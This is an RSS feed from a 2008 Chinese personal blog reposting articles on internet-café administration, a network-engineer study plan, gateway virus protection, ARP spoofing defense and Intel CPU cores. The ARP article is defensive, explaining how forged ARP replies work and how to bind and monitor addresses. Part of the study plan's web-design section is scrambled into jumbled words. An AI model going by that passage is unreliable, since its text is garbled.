<?xml version="1.0" encoding="GBK" ?>
<rss version="2.0" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:dcterms="http://purl.org/dc/terms/">
 <channel>
  	  <title><![CDATA[VIP的博客]]></title>
	  <link>http://wnnqt.blog.163.com</link>
	  <description><![CDATA[伱℡[說伱願意ジ啝Ｗǒ在壹起 ~ 囿①天Ｗǒ丢了. 伱會ㄨiang我嗎o..oο ]]></description>
	  <language>zh-CN</language>
	  <pubDate>Mon, 6 Oct 2008 14:33:06 +0800</pubDate>
	  <lastBuildDate>Mon, 6 Oct 2008 14:33:06 +0800</lastBuildDate>
	  <docs>http://blogs.law.harvard.edu/tech/rss</docs>
	  <generator><![CDATA[NetEase Space]]></generator>
	  <managingEditor><![CDATA[wnnqt]]></managingEditor>
	  <webMaster><![CDATA[ し楠し]]></webMaster>
		  <ttl>120</ttl>
	  <image>
	  	<title><![CDATA[VIP的博客]]></title>
	  	<url>http://ava.blog.163.com/photo/_mf06jthXsu_7Ui2QgWl7w==/5425711651074932073.jpg</url>
	  	<link>http://wnnqt.blog.163.com</link>
	  </image>
  <item>
  	<title><![CDATA[三位资深网吧网管寄语 拥有技术我自豪]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420089622634609</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">三位资深网吧网管寄语 拥有技术我自豪</P>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">引言：本文严格的说起来不可以独立成文，考虑到文章里主角都是工作网吧行业中的资深网管，他们的生活经历相比对很多网吧网管朋友有所帮助，所以才将文章摘引过来，但愿你我都能从中阅读到有用的信息。 </P>
<P style="TEXT-INDENT: 2em">　　向小波：年龄33，湖北宜昌人，从事网吧工作6年，平时生活简单，网吧到家两点一线，现在多了一个项目就是去玩杀人游戏。在个人收入方面，所得到的或许要比一般网吧的网管高很多。</P>
<P style="TEXT-INDENT: 2em">　　从业经历</P>
<P style="TEXT-INDENT: 2em">　　1999年3月始，开发自己的网络克隆系统。</P>
<P style="TEXT-INDENT: 2em">　　2000年7月至今，分别为凌云网吧、都市新干线网吧、捷通网城等湖北宜昌内的10余家单体网吧进行电脑与服务器的维护工作。</P>
<P style="TEXT-INDENT: 2em">　　行业寄语</P>
<P style="TEXT-INDENT: 2em">　　电脑技术需要不断地去钻研，学习与实践是提升技术水平的主要途径，不断地阅读各种资料，拓宽自己的知识面，电脑技术学无止境。</P>
<P style="TEXT-INDENT: 2em">　　工作绝技：与一般网吧中网管不同的是，我是个可以做大型系统维护的纯技术型网管，由我管理的网吧内的机器维护都是自动化的。比如100台机器要克隆，那么我会用先进的网络克隆技术，而不是单机器逐个安装。也就是说我刻100台机器的时候只需要设置好了，在服务器点一下netghost然后我就可以走了。吃个夜宵回来，系统就全部安装好了。机器会自己刻完以后完成所有必须修改的项目。令我骄傲的是，我所用的网络克隆系统是我们自己开发编写的<A href="http://www.txwb.com/Article/serverHelp/wbxt/">网吧系统</A>管理软件。这种软件稳定和兼容性好，针对不同的硬件配置有不同的版本，可以最大限度发挥计算机的效能。</P>
<P style="TEXT-INDENT: 2em">　　李航：毕业于江西师范大学计算机及其应用专业，后又参加江西新华电脑学院的清华万博网络工程师培训，现持有清华万博网络工程师证书。在网吧从事工作3年，熟练掌握网吧内的一切技术：如路由器与交换机配置、软路由设置、代理服务器配置、网线制作、局域网组建等，能及时排除网吧内机子的软硬件故障、客人上网遇到的一切问题等各种疑难杂症及突发问题。</P>
<P style="TEXT-INDENT: 2em">　　从业经历</P>
<P style="TEXT-INDENT: 2em">　　2003年3月～2004年，海力电脑（联想专卖）任销售兼技术。</P>
<P style="TEXT-INDENT: 2em">　　2004年6月～2005年，山海城电脑城任销售兼技术。&lt;BR&gt;&amp;nbsp;&amp;nbsp;2005年2月～12月，三利技佳电脑培训中心任教师，网管。&lt;BR&gt;&amp;nbsp;&amp;nbsp;2006年至今，锐龙谷网吧任技术主管。</P>
<P style="TEXT-INDENT: 2em">　　行业寄语</P>
<P style="TEXT-INDENT: 2em">　　也许在网吧里顾客叫我的时候都会喊成是“网管”，但我是把自己定位在技术员上的，我认为技术员跟网管的工作性质有很大差别，是真正静下心来搞技术的。<A href="http://www.txwb.com/Article/wyzy/wyzl/MFYX/200703/5504.html">希望</A>诸位技术员能够通过自己丰富的专业知识和实践经验，让更多的人把咱们跟网管区别开来！</P>
<P style="TEXT-INDENT: 2em">　　工作绝技：除了一般技术员都会的电影与游戏服务器的架设、计费软件的安装与设置、母盘制作，游戏更新等，我还为所在网吧量身定做了一个页面，以及配套的远程视频系统。为来玩的顾客提供更为个性化的服务，通过此项服务大大地提高了我们网吧的竞争力，客流比周围同等条件的网吧都要高上许多。</P>
<P style="TEXT-INDENT: 2em">　　本文摘自CBI，内容很简单，可以说是三位网吧网管的简单而真实的心里话，拿过来跟众多的网吧网管分享。编注。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420089622634609</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420089622634609</guid>
    <pubDate>Mon, 6 Oct 2008 14:26:34 +0800</pubDate>
    <dcterms:modified>2008-10-06T14:26:34+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[成为网络工程师最快途径—从网管员学起]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420089622324334</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">成为网络工程师最快途径—从网管员学起</P>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　知道你有没有计算机基础，没有的话去学cisco认证，从头系统的学，只要你认真学的话，达到你的目标轻而易举，如果你有计算机基础，就可以自己买一些计算机网络方面的书，这样的书，书店有很多的。</P>
<P style="TEXT-INDENT: 2em">　　首先涉足软件操作平台的学习（基础知识），然后，在此基础上你已经有能力通过循序渐进学习思科认证体系推荐课程来掌握对不同厂商、不同类型的网络设备、服务器等进行统一配置管理、失效管理、性能管理、计帐管理和安全管理的能力、把数据库应用转移到基于Internet的网络环境中，在网络上实现对工作流处理的能力了,这时，在知识结构上讲，你已经是具有相当竞争优势的网络技术人才了,接下来你可以考取一个网络方面的认证证书，认证证书是各知名IT厂商针对其最先进的技术，为业界建立的一套对IT人才进行衡量的标准，很多企业已经借此作为招聘人才的标准了（惨——）！不仅仅是工作上的好处，即便是出国学习，技术移民，认证证书可以帮助你相关专业免修学分，移民加分。所以，你所拥有的充满技术含金量的认证证书会真正成为你叩响成功之门的敲门砖，推荐思科的CCNA，CCNP或微软的MCSE。</P>
<P style="TEXT-INDENT: 2em">如果没有基础，建议从网络管理员学起(务必！)</P>
<P style="TEXT-INDENT: 2em">一、计算机基础、商务办公、网络应用</P>
<P style="TEXT-INDENT: 2em">1、计算机基本组成结构与工作原理</P>
<P style="TEXT-INDENT: 2em">2、键盘练习与中英文打字（五笔）</P>
<P style="TEXT-INDENT: 2em">3、Win2000/xp操作系统应用</P>
<P style="TEXT-INDENT: 2em">4、Word2000文档编辑处理</P>
<P style="TEXT-INDENT: 2em">5、Excel数据表的应用</P>
<P style="TEXT-INDENT: 2em">6、Powerpoint幻灯片制作</P>
<P style="TEXT-INDENT: 2em">7、Access数据库技术</P>
<P style="TEXT-INDENT: 2em">8、Frontpage文件与网页编辑</P>
<P style="TEXT-INDENT: 2em">9、InternetExplorer操作与使用</P>
<P style="TEXT-INDENT: 2em">10、Outlook邮件发与管理</P>
<P style="TEXT-INDENT: 2em">11、常用软件安装与使用</P>
<P style="TEXT-INDENT: 2em">12、计算机病毒处理与维护</P>
<P style="TEXT-INDENT: 2em">13、Moden设置安装</P>
<P style="TEXT-INDENT: 2em">二、计算机组装、调试与维修及局域网设置构建</P>
<P style="TEXT-INDENT: 2em">1、多媒体电脑硬件结构与组装调试</P>
<P style="TEXT-INDENT: 2em">2、多媒体电脑各部件详解与故障分析维修</P>
<P style="TEXT-INDENT: 2em">3、系统与常用软件安装与优化</P>
<P style="TEXT-INDENT: 2em">4、Internet上网的设置</P>
<P style="TEXT-INDENT: 2em">5、企业局域网原理与配置维护</P>
<P style="TEXT-INDENT: 2em">三、计算机网络配置、构建、维护</P>
<P style="TEXT-INDENT: 2em">1、计算机网络模型与TCP/IP协议</P>
<P style="TEXT-INDENT: 2em">2、WIN2000/server/NT配置与组网</P>
<P style="TEXT-INDENT: 2em">3、Web/DNS/FTP/E-mail服务器的应用与调试配置</P>
<P style="TEXT-INDENT: 2em">4、CiscoCCNA网络工程师认证全部课程（路由器、交换机全实验环境）</P>
<P style="TEXT-INDENT: 2em">5、布线规范与实操</P>
<P style="TEXT-INDENT: 2em">6、综合网络工程实例剖析与实验</P>
<P style="TEXT-INDENT: 2em">四、计算机专业英语</P>
<P style="TEXT-INDENT: 2em">使学生理解、掌握和记忆一定量的计算机专业词汇和基本概念以及计算机专业英语的常用结构、句式，能较好地完成专业资料的英汉互译，为今后熟练阅读英文的计算机技术文献、资料和书籍打下良好基础。</P>
<P style="TEXT-INDENT: 2em">五、Redhatlinux操作系统</P>
<P style="TEXT-INDENT: 2em">1、Linux操作系统安装、基本设置及系统管理</P>
<P style="TEXT-INDENT: 2em">2、LINUX与windows共享资源</P>
<P style="TEXT-INDENT: 2em">3、WEB服务器的安装、配置</P>
<P style="TEXT-INDENT: 2em">4、邮件服务器的安装、配置（send-maill）</P>
<P style="TEXT-INDENT: 2em">5、FTP服务器的安装配置（Wu-Ttpd）</P>
<P style="TEXT-INDENT: 2em">6、DNS服务器的安装、配置（NAMED）</P>
<P style="TEXT-INDENT: 2em">7、网络安全及管理</P>
<P style="TEXT-INDENT: 2em">六、MacromediaWeb多媒体网站设计</P>
<P style="TEXT-INDENT: 2em">1、DreamweaverMX网页，站点建立与页面跳转，构建与管理站点，超级链接，外部链接，邮件链接，下载链接，使用层与页面布局，本应用，时间轴，关键帧，动画，运动路径，Css样式表，行为，鼠标事件Java，信息框，广告条，提示信息，控制动画播放，使用模板，库面板与历史面板，网页图像格式，滚动图，导航图等图像使用，表域.表项，浏览项，递交,重置按钮.反馈地址与跳转菜单，表格，框架使用制，M，网。</P>
<P style="TEXT-INDENT: 2em">2、FireworksX页界面创建导入文档绘编辑图像，bWe颜色,样屏绘画与颜色，符号与实体，路径动画，变形动画，动态按钮，时间轴的使用，综合实例。</P>
<P style="TEXT-INDENT: 2em">3、Action指令，新建场景与场景属性，板图形中用文本像处理符号面使图按钮与滚动图，创建，优化，导出动画，帧的使用，综合实例3Flas页动画6、网站的建设策略：框架的应用，网站的接入方式，域名注册与服务器的选择，网站的表单元素及使用，CCS层叠样式表的嵌入，整场属性，入按钮添加actin，按钮制动画播放调景插控。</P>
<P style="TEXT-INDENT: 2em">4、HTML语言：HTML概述，基本标签，基本HTML元素，多媒体对象组织与风格，网站中的数据库应用，网站的安全与防范，网站的调试与发布，FTP上传站点建立与维护。</P>
<P style="TEXT-INDENT: 2em">七、Access2000和SQLserver2000数据库开发</P>
<P style="TEXT-INDENT: 2em">1、Access数据库窗口、数据表、对象、查询、窗体、报表、Web页对象，Access表、字段、说明、数据类型、关键字、查找过滤、导入、链接表、关键字索引，Access窗体编辑、数据分析、查询、报表向导、邮政、Access数据库压缩、加密、解密、安全控制。</P>
<P style="TEXT-INDENT: 2em">2、SQLserver2000数据库开发，SQLserver服务器的管理与安全，SQLQueryAnalyzer的使用，Transct-SQL语言基础，SQLserver数据库管理及使用，SQLserver视图，使用Transact-SQL语言进行程序设计、数据完整性设计及实、存储过程与触发器QLserver的数据传输服务，SQLserver与Web的结合。</P>
<P style="TEXT-INDENT: 2em">八、ASP编程动态数据库网站与企业信息管理系统开发</P>
<P style="TEXT-INDENT: 2em">1、ASP开发环境即服务器的配置。</P>
<P style="TEXT-INDENT: 2em">2、HTML标记语言及Vb脚本语言。</P>
<P style="TEXT-INDENT: 2em">3、操作系统与服务器的配置。</P>
<P style="TEXT-INDENT: 2em">4、ASP内置对象的使用（方法、综合、属性）。</P>
<P style="TEXT-INDENT: 2em">5、ADO组件（connection,Recordeset,Command）对象。</P>
<P style="TEXT-INDENT: 2em">6、应用ASP开发动态数据库网站及企业信息管理系统。</P>
<P style="TEXT-INDENT: 2em">九、汇编语言</P>
<P style="TEXT-INDENT: 2em">1、微机结构，CPU寄存器组，存储分段管理方式。</P>
<P style="TEXT-INDENT: 2em">2、指令系统导地方式、指令格式、数据传送、算术运算指令、逻辑运算指令、串操作指令、控制转段指令、条件字节设置、处理器控制指令、位操作指令。</P>
<P style="TEXT-INDENT: 2em">3、汇编调试环境设置及程序编译调试环境配置及程序编译调试。</P>
<P style="TEXT-INDENT: 2em">4、汇编语言伪指令及高级汇编技术。</P>
<P style="TEXT-INDENT: 2em">5、汇编语言程序设计方法。</P>
<P style="TEXT-INDENT: 2em">6、BIOS和DOS功能调用。</P>
<P style="TEXT-INDENT: 2em">十、C语言程序设计</P>
<P style="TEXT-INDENT: 2em">1、C语言特点、上机步骤、调试流程与运行。</P>
<P style="TEXT-INDENT: 2em">2、算法的特点与表示方法。</P>
<P style="TEXT-INDENT: 2em">3、数据类型、运算符与表达式。</P>
<P style="TEXT-INDENT: 2em">4、C语言的基本语句和顺序结构程序设计。</P>
<P style="TEXT-INDENT: 2em">5、条件语句与选择结构程序设计。</P>
<P style="TEXT-INDENT: 2em">6、循环语句与循环结构程序设计。</P>
<P style="TEXT-INDENT: 2em">7、数组。</P>
<P style="TEXT-INDENT: 2em">8、函数。</P>
<P style="TEXT-INDENT: 2em">9、指针。</P>
<P style="TEXT-INDENT: 2em">10、结构与共同体。</P>
<P style="TEXT-INDENT: 2em">11、文件。</P>
<P style="TEXT-INDENT: 2em">十一、操作系统原理</P>
<P style="TEXT-INDENT: 2em">1、操作系统概述。</P>
<P style="TEXT-INDENT: 2em">2、进程管理。</P>
<P style="TEXT-INDENT: 2em">3、死锁。</P>
<P style="TEXT-INDENT: 2em">4、存储管理。</P>
<P style="TEXT-INDENT: 2em">5、I/O设备管理。</P>
<P style="TEXT-INDENT: 2em">6、文件系统。</P>
<P style="TEXT-INDENT: 2em">十二、VB面向对象编程与C/S分布开发</P>
<P style="TEXT-INDENT: 2em">1、SQL运用数据语言。</P>
<P style="TEXT-INDENT: 2em">2、ADO存取数据库的表示二维对象群。</P>
<P style="TEXT-INDENT: 2em">3、DateEnvironnlent数据库整合。</P>
<P style="TEXT-INDENT: 2em">4、关联性在数据库程序中的实际应用。</P>
<P style="TEXT-INDENT: 2em">5、DiteReport报表生成器。</P>
<P style="TEXT-INDENT: 2em">6、实现不同功能的数据库系统，开发各种功能不同的数据库系统。</P>
<P style="TEXT-INDENT: 2em">十三、软件工程</P>
<P style="TEXT-INDENT: 2em">1、软件工程的产生、发展、软件生命周期及分布开发模型。</P>
<P style="TEXT-INDENT: 2em">2、软件开发各阶段的目标、任务特点、步骤、文档。</P>
<P style="TEXT-INDENT: 2em">3、结构化方法的基本思想、开发过程和步骤、应遵循原则和准则。</P>
<P style="TEXT-INDENT: 2em">4、面向对象方法的基本思想、基本概念、基本模型。</P>
<P style="TEXT-INDENT: 2em">5、软件工程的技术管理。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420089622324334</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420089622324334</guid>
    <pubDate>Mon, 6 Oct 2008 14:23:24 +0800</pubDate>
    <dcterms:modified>2008-10-06T14:23:24+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[从网关防护根治病毒及恶意软件]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420089621924309</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">从网关防护根治病毒及恶意软件</P>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">机病毒的发展从DOS时代走到了Windows时代，从引导区病毒走到了网络病毒时代，从病毒作俑者自我炫耀的时代走到了以经济利益为目的的时代。这其中经历了不过短短的20年。为什么短短的20年病毒的发展如此迅速，现在的病毒主要是哪些类型，对我们会造成哪些危害，我们需要做什么准备？作为信息时代的守护神——信息管理者，你准备好了吗？ </P>
<P style="TEXT-INDENT: 2em">　　病毒发展历经几代，最初80年代以破坏磁盘的引导扇区而诞生的病毒为起始，到90年代主要针对Windows的文件型病毒；随着互联网时代的到来，越来越多的病毒通过Email的方式进行传播，速度快、涉及面广，难于根治，再有利用系统漏洞进行传播的病毒也是非常难缠的；随后是以间谍软件、网络钓鱼为代表的恶意软件时代，这一时期的恶意软件的经济利益目的已经十分明显。 </P>
<P style="TEXT-INDENT: 2em">　　但是未来的病毒是什么样的？我们不能预知未来，但有一点可以肯定：其传播的范围会越来越广，病毒的自我隐藏将更加隐秘，其目的将直接体现为经济利益。这一点我们从现在逐渐受关注的僵尸网络可以看出苗头。 </P>
<P style="TEXT-INDENT: 2em">　　根据病毒的发展史，结合我们现在的互联网时代可以看出，我们当前面临的主要是下面几方面的威胁：通过系统漏洞传播的病毒将会越来越多，“零天攻击”离我们已经越来越近；间谍软件、网络钓鱼、玩笑程序、非法拨号等；利用互联网传播的垃圾邮件、非法内容日益增多。 </P>
<P style="TEXT-INDENT: 2em">　　从企业目前面临的问题，需要怎样防护？通过什么方式防护？是解决上述问题的首要关键。根据上面的问题我们可以看出，大量的威胁都是来自于互联网，而企业连接互联网必然会有一个出口，如果需要根治这些问题，需要首先从网关防护开始。究竟从网关处怎样防护呢？ </P>
<P style="TEXT-INDENT: 2em">　　一、从企业网络防病毒的角度去看 </P>
<P style="TEXT-INDENT: 2em">　　企业应用最广的互联网应用主要有：网页浏览、FTP上传下载、收发Email、网络新闻查看等。病毒制造者充分利用了企业的这些日常应用，将病毒隐藏在这些应用中，当HTTP协议浏览网页，通过FTP下载，通过SMTP发送邮件，通过POP3、IMAP4收取邮件的时候。看似正常的一个数据包，其实是一个病毒。 </P>
<P style="TEXT-INDENT: 2em">　　二、针对恶意软件的防护 </P>
<P style="TEXT-INDENT: 2em">　　恶意软件通常在用户的系统里具有潜伏性、隐蔽性，如果通过防病毒软件进行查杀，很难将其彻底清除，需要一种行之有效的防护措施。而通过网关防护将是一种更加理想的方式，对清除间谍软件、玩笑程序、非法拨号器、网络钓鱼等效果非常理想。 </P>
<P style="TEXT-INDENT: 2em">　　三、针对垃圾邮件、内容过滤、Web过滤的防护 </P>
<P style="TEXT-INDENT: 2em">　　从上面的问题我们了解到，垃圾邮件严重占用网络带宽，影响员工工作效率。 </P>
<P style="TEXT-INDENT: 2em">　　在恶意软件、网络病毒层出不穷的时代，看好自己的“大门”显得尤为重要，只有真正起到了防护作用，才能充分保障您的信息资产。 </P>
<P style="TEXT-INDENT: 2em">　　明天，谁让我们跟病毒和恶意软件告别? &nbsp; </P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420089621924309</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420089621924309</guid>
    <pubDate>Mon, 6 Oct 2008 14:19:24 +0800</pubDate>
    <dcterms:modified>2008-10-06T14:19:24+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[防止局域网内ARP欺骗]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420089621743157</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">专家支招 防止局域网内ARP欺骗</P>
<P style="TEXT-INDENT: 2em">对于ARP欺骗，提出几点加强安全防范的措施。环境是主机或者网关是基于Linux/BSD的。 </P>
<P style="TEXT-INDENT: 2em">　　一、理论前提 </P>
<P style="TEXT-INDENT: 2em">　　本着“不冤枉好人，不放过一个坏人的原则”，先说说我的一些想法和理论依据。首先，大家肯定发送ARP欺骗包肯定是一个恶毒的程序自动发送的，正常的TCP/IP网络是不会有这样的错误包发送的。这就假设，如果犯罪嫌疑人没有启动这个破坏程序的时候，网络环境是正常的，或者说网络的ARP环境是正常的，如果我们能在犯罪嫌疑人启动这个犯罪程序的第一时间，一开始就发现了他的犯罪活动，那么就是人赃俱在，不可抵赖了，因为刚才提到，前面网络正常的时候证据是可信和可依靠的。好，接下来我们谈论如何在第一时间发现他的犯罪活动。 </P>
<P style="TEXT-INDENT: 2em">　　ARP欺骗的原理如下： </P>
<P style="TEXT-INDENT: 2em">　　假设这样一个网络，一个Hub接了3台机器 </P>
<P style="TEXT-INDENT: 2em">　　HostA HostB HostC 其中 </P>
<P style="TEXT-INDENT: 2em">　　A的地址为：IP：192.168.10.1 MAC: AA-AA-AA-AA-AA-AA </P>
<P style="TEXT-INDENT: 2em">　　B的地址为：IP：192.168.10.2 MAC: BB-BB-BB-BB-BB-BB </P>
<P style="TEXT-INDENT: 2em">　　C的地址为：IP：192.168.10.3 MAC: CC-CC-CC-CC-CC-CC </P>
<P style="TEXT-INDENT: 2em">　　正常情况下 C:\arp -a </P>
<P style="TEXT-INDENT: 2em">　　Interface: 192.168.10.1 on Interface 0x1000003 </P>
<P style="TEXT-INDENT: 2em">　　Internet Address Physical Address Type </P>
<P style="TEXT-INDENT: 2em">　　192.168.10.3 CC-CC-CC-CC-CC-CC dynamic </P>
<P style="TEXT-INDENT: 2em">　　现在假设HostB开始了罪恶的ARP欺骗： </P>
<P style="TEXT-INDENT: 2em">　　B向A发送一个自己伪造的ARP应答，而这个应答中的数据为发送方IP地址是192.168.10.3（C的IP地址），MAC地址是DD-DD-DD-DD-DD-DD（C的MAC地址本来应该是CC-CC-CC-CC-CC-CC，这里被伪造了）。当A接收到B伪造的ARP应答，就会更新本地的ARP缓存（A可不知道被伪造了）。而且A不知道其实是从B发送过来的，A这里只有192.168.10.3（C的IP地址）和无效的DD-DD-DD-DD-DD-DD mac地址，没有和犯罪分子B相关的证据，哈哈，这样犯罪分子岂不乐死了。 </P>
<P style="TEXT-INDENT: 2em">　　现在A机器的ARP缓存更新了： </P>
<P style="TEXT-INDENT: 2em">　　C:\&gt;arp -a </P>
<P style="TEXT-INDENT: 2em">　　Interface: 192.168.10.1 on Interface 0x1000003 </P>
<P style="TEXT-INDENT: 2em">　　Internet Address Physical Address Type </P>
<P style="TEXT-INDENT: 2em">　　192.168.10.3 DD-DD-DD-DD-DD-DD dynamic </P>
<P style="TEXT-INDENT: 2em">　　这可不是小事。局域网的网络流通可不是根据IP地址进行，而是按照MAC地址进行传输。现在192.168.10.3的MAC地址在A上被改变成一个本不存在的MAC地址。现在A开始Ping 192.168.10.3，网卡递交的MAC地址是DD-DD-DD-DD-DD-DD，结果是什么呢？网络不通，A根本不能Ping通C！！ </P>
<P style="TEXT-INDENT: 2em">　　所以，局域网中一台机器，反复向其他机器，特别是向网关，发送这样无效假冒的ARP应答信息包，NND，严重的网络堵塞就开始了！网吧管理员的噩梦开始了。我的目标和任务，就是第一时间，抓住他。不过从刚才的表述好像犯罪分子<A href="http://www.txwb.com/Article/wyzl/SFYX/200703/5604.html">完美</A>的利用了以太网的缺陷，掩盖了自己的罪行。但其实，以上方法也有留下了蛛丝马迹。尽管，ARP数据包没有留下HostB的地址，但是，承载这个ARP包的ethernet帧却包含了HostB的源地址。而且，正常情况下ethernet数据帧中，帧头中的MAC源地址/目标地址应该和帧数据包中ARP信息配对，这样的ARP包才算是正确的。如果不正确，肯定是假冒的包，可以提醒！但如果匹配的话，也不一定代表正确，说不定伪造者也考虑到了这一步，而伪造出符合格式要求，但内容假冒的ARP数据包。不过这样也没关系，只要网关这里拥有本网段所有MAC地址的网卡数据库，如果和Mac数据库中数据不匹配也是假冒的ARP数据包。也能提醒犯罪分子动手了。 </P>
<P style="TEXT-INDENT: 2em">　　二、防范措施 </P>
<P style="TEXT-INDENT: 2em">　　1. 建立DHCP服务器(建议建在网关上，因为DHCP不占用多少CPU，而且ARP欺骗攻击一般总是先攻击网关，我们就是要让他先攻击网关，因为网关这里有监控程序的，网关地址建议选择192.168.10.2 ，把192.168.10.1留空，如果犯罪程序愚蠢的话让他去攻击空地址吧)，另外所有客户机的IP地址及其相关主机信息，只能由网关这里取得，网关这里开通DHCP服务，但是要给每个网卡，绑定固定唯一IP地址。一定要保持网内的机器IP/MAC一一对应的关系。这样客户机虽然是DHCP取地址，但每次开机的IP地址都是一样的。 </P>
<P style="TEXT-INDENT: 2em">　　2. 建立MAC数据库，把网吧内所有网卡的MAC地址记录下来，每个MAC和IP、地理位置统统装入数据库，以便及时查询备案。 </P>
<P style="TEXT-INDENT: 2em">　　3. 网关机器关闭ARP动态刷新的过程，使用静态路邮，这样的话，即使犯罪嫌疑人使用ARP欺骗攻击网关的话，这样对网关也是没有用的，确保主机安全。 </P>
<P style="TEXT-INDENT: 2em">　　网关建立静态IP/MAC捆绑的方法是：建立/etc/ethers文件，其中包含正确的IP/MAC对应关系，格式如下： </P>
<P style="TEXT-INDENT: 2em">　　192.168.2.32 08:00:4E:B0:24:47 </P>
<P style="TEXT-INDENT: 2em">　　然后再/etc/rc.d/rc.local最后添加： </P>
<P style="TEXT-INDENT: 2em">　　arp -f 生效即可 </P>
<P style="TEXT-INDENT: 2em">　　4. 网关监听网络安全。网关上面使用TCPDUMP程序截取每个ARP程序包，弄一个脚本分析软件分析这些ARP协议。ARP欺骗攻击的包一般有以下两个特点，满足之一可视为攻击包报警：第一以太网数据包头的源地址、目标地址和ARP数据包的协议地址不匹配。或者，ARP数据包的发送和目标地址不在自己网络网卡MAC数据库内，或者与自己网络MAC数据库 MAC/IP 不匹配。这些统统第一时间报警，查这些数据包（以太网数据包）的源地址(也有可能伪造)，就大致知道那台机器在发起攻击了。 </P>
<P style="TEXT-INDENT: 2em">　　5. 偷偷摸摸的走到那台机器，看看使用人是否故意，还是被任放了什么木马程序陷害的。如果后者，不声不响的找个借口支开他，拔掉网线(不关机,特别要看看Win98里的计划任务)，看看机器的当前使用记录和运行情况，确定是否是在攻击。 &nbsp; </P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420089621743157</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420089621743157</guid>
    <pubDate>Mon, 6 Oct 2008 14:17:43 +0800</pubDate>
    <dcterms:modified>2008-10-06T14:17:43+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[INTEL核心]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/48191094200861510555541</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em"><SPAN><A></A><STRONG>Tualatin</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">　　这也就是大名鼎鼎的“图拉丁”核心，是Intel在Socket 370架构上的最后一种CPU核心，采用0.13um制造工艺，封装方式采用FC-PGA2和PPGA，核心电压也降低到了1.5V左右，主频范围从1GHz到1.4GHz，外频分别为100MHz（赛扬）和133MHz（Pentium III），二级缓存分别为512KB（Pentium III-S）和256KB（Pentium III和赛扬），这是最强的Socket 370核心，其性能甚至超过了早期低频的Pentium 4系列CPU。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Willamette</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">　　这是早期的Pentium 4和P4赛扬采用的核心，最初采用Socket 423接口，后来改用Socket 478接口（赛扬只有1.7GHz和1.8GHz两种，都是Socket 478接口），采用0.18um制造工艺，前端总线频率为400MHz， 主频范围从1.3GHz到2.0GHz（Socket 423）和1.6GHz到2.0GHz（Socket 478），二级缓存分别为256KB（Pentium 4）和128KB（赛扬），注意，另外还有些型号的Socket 423接口的Pentium 4居然没有二级缓存！核心电压1.75V左右，封装方式采用Socket 423的PPGA INT2，PPGA INT3，OOI 423-pin，PPGA FC-PGA2和Socket 478的PPGA FC-PGA2以及赛扬采用的PPGA等等。Willamette核心制造工艺落后，发热量大，性能低下，已经被淘汰掉，而被Northwood核心所取代。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Northwood</STRONG></SPAN></P>
<P style="TEXT-INDENT: 2em">　　这是目前主流的Pentium 4和赛扬所采用的核心，其与Willamette核心最大的改进是采用了0.13um制造工艺，并都采用Socket 478接口，核心电压1.5V左右，二级缓存分别为128KB（赛扬）和512KB（Pentium 4），前端总线频率分别为400/533/800MHz（赛扬都只有400MHz），主频范围分别为2.0GHz到2.8GHz（赛扬），1.6GHz到2.6GHz（400MHz FSB Pentium 4），2.26GHz到3.06GHz（533MHz FSB Pentium 4）和2.4GHz到3.4GHz（800MHz FSB Pentium 4），并且3.06GHz Pentium 4和所有的800MHz Pentium 4都支持超线程技术（Hyper-Threading Technology），封装方式采用PPGA FC-PGA2和PPGA。按照Intel的规划，Northwood核心会很快被Prescott核心所取代。</P>
<P style="TEXT-INDENT: 2em"><A href="http://baike.baidu.com/view/392731.html#"></A><SPAN><A></A><STRONG>Prescott</STRONG></SPAN></P>
